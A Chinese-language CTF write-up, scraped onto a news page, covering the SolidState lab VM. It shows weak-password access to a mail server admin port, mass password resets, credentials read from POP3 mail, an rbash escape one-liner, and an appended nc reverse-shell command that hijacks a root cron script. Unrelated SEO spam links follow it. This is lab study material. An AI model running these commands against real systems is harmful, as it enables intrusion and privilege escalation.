当前位置: 首页 > news >正文

创意做网站公司网站设计案例

创意做网站公司,网站设计案例,可口可乐网站建设策划方案,班组建设网站声明! 学习资源来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关&a…

声明!
学习资源来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)


有想要了解oscp认证证书的可以私信我哦,泷羽sec新年特惠!!!


Solidstate靶机wp

环境:

攻击机:kali ip地址:192.168.66.141

靶机:Solidstate ip地址:192.168.66.135

安装好靶机后,nmap扫描出靶机地址

使用-sS和-sV参数查看端口详细信息,发现4555端口开启了,可以利用远程执行命令的漏洞

使用dirb查看该网站存在的文件夹

到浏览器中查看一下该网站

好像都没什么特别有用的信息,回到4555端口,尝试使用nc和弱口令连接,连接成功了

使用ls命令提示没有该命令,使用help命令看看

发现有几个命令可能能利用一个是listusers列出用户,另一个是setpassword重置密码

发现有五个用户,尝试将他们的密码都重置成123

尝试连接ssh,但是失败,密码不对

这个端口好像没啥用了,但是发现还有个110/pop3端口,POP3服务器是遵循POP3协议的接受邮件服务器,用于接收电子邮件

用刚刚的用户名和改了的密码登录,登陆成功了

使用list命令查看文件和retr命令下载文件
(RETR和STOR命令是FTP协议中的下载和上传命令, 可以针对文件和目录)

第一个用户没有什么信息,切换用户

第二个也没有,再切

第三个用户爆出了一些信息,记录下来

第四个用户也有些信息,并且retr 2居然直接爆出了账号和密码

username: mindy

pass: P@55W0rd1!2@

试着使用ssh连接,连接成功了

ls出了一个user.txt文件,cat试一下,发现是一段密文

但是在想尝试切到其他文件夹时,发现切换不了,在报错的前缀里面看到rbash,是受限制的shell

尝试使用一句话绕过:

ssh mindy@192.168.66.135 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"

(如果环境中存在python环境且没有被封禁,"export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"是通用的)

可以正常使用了

在上面的信息中,可以看到ssh的凭证来自于james用户

看一下james用户的进程运行情况,发现多次出现一个opt的文件夹

切换到opt目录,ls列一下文件列表有一个py文件是root权限,可能可以利用

好像是要改什么东西

使用一句话追加到py文件,使其能反弹shell到攻击机

echo "os.system('/bin/nc -e /bin/bash 192.168.66.141 9999')" >> tmp.py

执行文件反弹到攻击机,提权成功

一开始是使用覆盖的写法写入python文件,后面去查了一下加上群友的提醒发现原文件是root执行了一个定期任务,隔一分钟执行一次该文件,将其覆盖写入后原来的定时执行模块就被删除了,导致我之前死活提权不成功

本次靶机主要是在多个端口中获取信息,在4555端口修改邮箱用户的密码,在110端口通过邮箱用户获取到ssh登陆密码,然后通过python的一句话命令执行shell逃逸,再通过计划任务的py文件进行提权

http://www.hkea.cn/news/795372/

相关文章:

  • 微信小程序怎么制作游戏安卓优化清理大师
  • 胶南做网站初学者做电商怎么入手
  • 网站为什么要维护佛山网络营销推广
  • 国企网站建设报告怎么建造自己的网站
  • 免费做司考真题的网站余姚网站如何进行优化
  • 如何网站开发1688网站
  • 丽水专业网站建设价格青岛网站优化
  • 网站开发专业培训学校百度推广登录官网入口
  • 贵阳做网站公司网站热度查询
  • 做课件最好的素材网站考拉seo
  • 网站建设玖首选金手指seo网站优化收藏
  • 台州卓远做网站好不好广州seo教程
  • dz网站数据备份bt磁力猪
  • github 可以做网站吗360seo
  • 杭州 企业门户网站建设爱链
  • dj那个网站做的好长沙公司网络营销推广
  • 设计师培训招生视频黑帽seo联系方式
  • 做网上贸易哪个网站好西宁网站seo
  • 电子烟网站建设杯子软文营销300字
  • 广州企业网站制作怎么做营销推广
  • 网站建设服务器在香港郑州网站建设专业乐云seo
  • 河北建设工程交易信息网海口关键词优化报价
  • 全国网站建设公司有多少家微信朋友圈广告投放收费标准
  • 免费做网站公司黑帽seo排名技术
  • apk连接wordpress上海seo
  • 企业建网站租用服务器好还是买一个好石家庄网站关键词推广
  • wordpress文件解析外贸网站优化
  • 建设工程竣工备案网站百度保障中心人工电话
  • 韶关城乡建设部网站首页营销型网站建设策划书
  • 建设银行手机银行下载官方网站谷歌浏览器网页版入口在哪里